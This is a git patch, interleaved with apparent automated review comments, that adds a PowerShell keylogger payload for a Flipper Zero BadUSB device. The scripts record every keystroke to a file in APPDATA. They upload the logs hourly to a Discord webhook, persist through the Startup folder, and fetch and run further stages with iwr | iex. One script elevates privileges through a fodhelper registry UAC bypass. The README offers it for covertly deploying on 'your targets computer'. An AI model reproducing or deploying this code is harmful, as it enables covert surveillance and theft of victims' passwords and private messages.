From 6eff5a5fe6a6c0ee493d013f917d0736d02484d1 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 3 Jan 2023 23:10:53 -0600 Subject: [PATCH] Add files via upload --- Payloads/Flip-Keylogger/-keys.ps1 | 69 +++++++++ Payloads/Flip-Keylogger/-logs.ps1 | 99 +++++++++++++ Payloads/Flip-Keylogger/-p.cmd | 4 + Payloads/Flip-Keylogger/README.md | 141 +++++++++++++++++++ Payloads/Flip-Keylogger/exit.ps1 | 43 ++++++ Payloads/Flip-Keylogger/keylogger - Copy.ps1 | 19 +++ Payloads/Flip-Keylogger/keylogger.ps1 | 7 + Payloads/Flip-Keylogger/keylogger.txt | 25 ++++ Payloads/Flip-Keylogger/s2.ps1 | 8 ++ 9 files changed, 415 insertions(+) create mode 100644 Payloads/Flip-Keylogger/-keys.ps1 create mode 100644 Payloads/Flip-Keylogger/-logs.ps1 create mode 100644 Payloads/Flip-Keylogger/-p.cmd create mode 100644 Payloads/Flip-Keylogger/README.md create mode 100644 Payloads/Flip-Keylogger/exit.ps1 create mode 100644 Payloads/Flip-Keylogger/keylogger - Copy.ps1 create mode 100644 Payloads/Flip-Keylogger/keylogger.ps1 create mode 100644 Payloads/Flip-Keylogger/keylogger.txt create mode 100644 Payloads/Flip-Keylogger/s2.ps1 diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1 new file mode 100644 index 0000000..d1d0774 --- /dev/null +++ b/Payloads/Flip-Keylogger/-keys.ps1 
@@ -0,0 +1,69 @@ +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore + + +function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){ + $signatures = @' + [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] + public static extern short GetAsyncKeyState(int virtualKeyCode); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int GetKeyboardState(byte[] keystate); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int MapVirtualKey(uint uCode, int uMapType); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +'@ + + $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru + + + $null = New-Item -Path $Path -ItemType File -Force + + try + { + Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red + + while ($true) { + Start-Sleep -Milliseconds 40 + $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') + $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl') + if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){exit} + + + for ($ascii = 9; $ascii -le 254; $ascii++) { + + $state = $API::GetAsyncKeyState($ascii) + + + if ($state -eq -32767) { + $null = [console]::CapsLock + + + $virtualKey = $API::MapVirtualKey($ascii, 3) + + + $kbstate = New-Object Byte[] 256 + $checkkbstate = $API::GetKeyboardState($kbstate) + + + $mychar = New-Object -TypeName System.Text.StringBuilder + + $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) + + if ($success) + { + + [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) + } + } + } + } + } + finally + { + 
+ #notepad $Path + } +} + +XXXlog diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 new file mode 100644 index 0000000..3591751 --- /dev/null +++ b/Payloads/Flip-Keylogger/-logs.ps1 
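Review bot: Nothing in -keys.ps1 documents what it leaves on disk. `XXXlog` creates `$env:appdata\-locker\$env:UserName-loot.txt` with `New-Item -Force` and appends every decoded key press to it through `AppendAllText`, so anything typed, passwords included, sits unencrypted in the user's profile until the directory is removed. A header comment such as `# Polls user32 GetAsyncKeyState every 40 ms; appends decoded keys in plaintext to %APPDATA%\-locker\<user>-loot.txt` would make that explicit for anyone auditing or cleaning up a test host. The `Add-Type -MemberDefinition` block with the `GetAsyncKeyState`/`ToUnicode` signatures is also the part that PowerShell script-block logging would record, which is worth stating in the README. The `finally` block holds only the commented-out `#notepad $Path` and can be dropped.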
@@ -0,0 +1,99 @@ +# powershell log scheduler +# created by : C0SM0 +# Modified by : Jakoby + +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore + + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} +} + +if([String]::IsNullOrWhiteSpace((Get-content "$env:appdata\-locker\log.txt"))){ +# times logs will be sent [keep in military time] +$logTimes = @( + '00:00:00', + '01:00:00', + '02:00:00', + '03:00:00', + '04:00:00', + '05:00:00', + '06:00:00', + '07:00:00', + '08:00:00', + '09:00:00', + '10:00:00', + '11:00:00', + '12:00:00', + '13:00:00', + '14:00:00', + '15:00:00', + '16:00:00', + '17:00:00', + '18:00:00', + '19:00:00', + '20:00:00', + '21:00:00', + '22:00:00', + '23:00:00' +) +} + +else {$logTimes = @( + (Get-content "$env:appdata\-locker\log.txt") +) +} + +# sort the times in chronological order +$logTimes = $logTimes | Sort-Object + +# ensure keylogger runs every day +while ($true) { + + # run keylogger for each trigger time + foreach ($t in $logTimes) + { + # checks if time passed already + if((Get-Date) -lt (Get-Date -Date $t)) + { + # sleeps until next time is reached + while ((Get-Date -Date $t) -gt (Get-Date)) + { + # sleeps + $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') + $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl') + if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt 
(Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){exit} + (Get-Date -Date $t) - (Get-Date) | Start-Sleep + } + + # runs keylogger + Upload-Discord -file $Path + echo "" > $Path + + + } + } +} diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd new file mode 100644 index 0000000..1dce41d --- /dev/null +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -0,0 +1,4 @@ +@echo off +powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1" +powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1" +powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1" diff --git a/Payloads/Flip-Keylogger/README.md b/Payloads/Flip-Keylogger/README.md new file mode 100644 index 0000000..0b51049 --- /dev/null +++ b/Payloads/Flip-Keylogger/README.md @@ -0,0 +1,141 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
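Review bot: The header `# powershell log scheduler` and the inline comment `# runs keylogger` do not describe what this loop does. At each trigger time `Upload-Discord -file $Path` sends the loot file with `curl.exe -F` to the URL read from `wh.txt`, and `echo "" > $Path` then truncates it. I would change the inline comment to `# upload the collected log to the webhook, then empty the file`, and the header to say the script reads `log.txt` (defaulting to hourly) and `wh.txt` from `%APPDATA%\-locker`. `Upload-Discord` is also duplicated verbatim in exit.ps1; a single shared definition would keep the two copies from drifting.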
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Keylogger + +This is a Powershell based keylogger that exfiltrates the logs to discord + +## Description + +Quickly with just ONE line of code you can deploy a keylogger on your targets computer + +Complete with custom logging times, and self destruct feature + +Just move the `keylogger.txt` file over to your flipper and you are good to go + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* 15 seconds later you have their keystrokes being sent to you + +This is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you + +* `$dc=''` is the variable where you plug in your discord webhook + +``` +powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https://jakoby.lol/m2m" | iex +``` +### ADDITIONAL PARAMETERS + +The payload is set to send the logs collected every hour on the hour + +* You maybe use the `$log` variable to specify a certain time instead (Use this for testing) +* ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm + +You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date + +`$ks="12/25/2022 10:00:00 PM"` <-- This will make the keylogger self delete at 10pm on December 25th + +Calling the script with both a `log` time and `killswitch` will look something like this: + +``` +powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' | iex" +``` +### DELETING THE KEYLOGGER + +Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up + +C# + + + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ diff --git a/Payloads/Flip-Keylogger/exit.ps1 b/Payloads/Flip-Keylogger/exit.ps1 new file mode 100644 index 0000000..1d05f17 --- /dev/null +++ b/Payloads/Flip-Keylogger/exit.ps1 @@ -0,0 +1,43 @@ +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore,PresentationFramework + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} +} + +while($true){ +$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') +$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl') +if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){ +Upload-Discord -file $Path +sleep 5 +Remove-Item "$env:appdata\-locker" -Recurse -Force; +Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3) +Remove-Item "$env:appdata\-exit.ps1" +exit +} +else{continue} +} diff --git a/Payloads/Flip-Keylogger/keylogger - Copy.ps1 b/Payloads/Flip-Keylogger/keylogger - Copy.ps1 new file mode 100644 index 0000000..3fc34b2 --- /dev/null +++ b/Payloads/Flip-Keylogger/keylogger - Copy.ps1 
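Review bot: The `Keylogger Disabled` popup in exit.ps1 is shown unconditionally after the `Remove-Item` calls, without checking that they succeeded or that the -keys.ps1 and -logs.ps1 processes have stopped. Those two scripts exit only through their own killswitch/Ctrl checks, and once `-locker` has been removed their `Get-Content` of `killswitch.txt` presumably returns nothing, so a hidden powershell.exe may still be running when the popup appears. The branch also calls `Upload-Discord -file $Path` before deleting anything, while the README describes this path only as a "self delete". The README should state both points, for example `Removal first uploads the remaining log to the webhook; afterwards confirm no hidden powershell.exe running -keys.ps1 or -logs.ps1 remains`.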
@@ -0,0 +1,19 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; +echo $log > "$env:appdata\-locker\log.txt"; +echo $ks > "$env:appdata\-locker\killswitch.txt"; + +function s1 { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; + + } + else{ + Break + } +} + +s1 diff --git a/Payloads/Flip-Keylogger/keylogger.ps1 b/Payloads/Flip-Keylogger/keylogger.ps1 new file mode 100644 index 0000000..3caa03e --- /dev/null +++ b/Payloads/Flip-Keylogger/keylogger.ps1 @@ -0,0 +1,7 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; +echo $log > "$env:appdata\-locker\log.txt"; +echo $ks > "$env:appdata\-locker\killswitch.txt"; + +irm https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex + diff --git a/Payloads/Flip-Keylogger/keylogger.txt b/Payloads/Flip-Keylogger/keylogger.txt new file mode 100644 index 0000000..a5fa34a --- /dev/null +++ b/Payloads/Flip-Keylogger/keylogger.txt 
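Review bot: `keylogger - Copy.ps1` looks like a stray working copy and should probably be dropped from this commit. The name ends in ` - Copy` and no other file in the patch references it. Its `s1` function also adds behaviour that keylogger.ps1 and the README do not have or mention: it writes `HKCU\Software\Classes\.259\Shell\Open\command` and `HKCU\Software\Classes\ms-settings\CurVer` and launches `fodhelper.exe`. If the file is kept on purpose, the README should list those registry keys among the changes the payload makes, since they are what someone auditing a test machine would need to look for.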
@@ -0,0 +1,25 @@ +REM Title: Keylogger + +REM Author: I am Jakoby + +REM Description: This is a Powershell based keylogger that exfiltrates the logs to discord + +REM Target: Windows 10, 11 + +REM ADDITIONAL PARAMETERS +REM The payload is set to send the logs collected every hour on the hour + +REM You maybe use the $log variable to specify a certain time instead (Use this for testing) +REM ex: $log="09:00 pm" <-- This will send the log every night at 9pm +REM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date + +REM $ks="12/25/2022 10:00:00 PM" <-- This will make the keylogger self delete at 10pm on December 25th + +REM Calling the script with both a log time and killswitch will look something like this: + +REM $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' | iex" +ENTER diff --git a/Payloads/Flip-Keylogger/s2.ps1 b/Payloads/Flip-Keylogger/s2.ps1 new file mode 100644 index 0000000..060390a --- /dev/null +++ b/Payloads/Flip-Keylogger/s2.ps1 
@@ -0,0 +1,8 @@ +# Add-MpPreference -ExclusionPath $env:appdata/-locker + +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/exit.ps1 -o "$env:appdata\-exit.ps1" + +start-process "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
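Review bot: The first line of s2.ps1, `# Add-MpPreference -ExclusionPath $env:appdata/-locker`, is commented-out code and should be deleted rather than committed. The script also lacks any documentation of what it installs. It writes `-p.cmd` into the user's Startup folder, `-keys.ps1` and `-logs.ps1` into `%APPDATA%\-locker`, and `-exit.ps1` into `%APPDATA%`, and none of these paths appear in the README. I would add a "Files written" list with those four paths to the README so a test host can be checked and restored without reading the scripts.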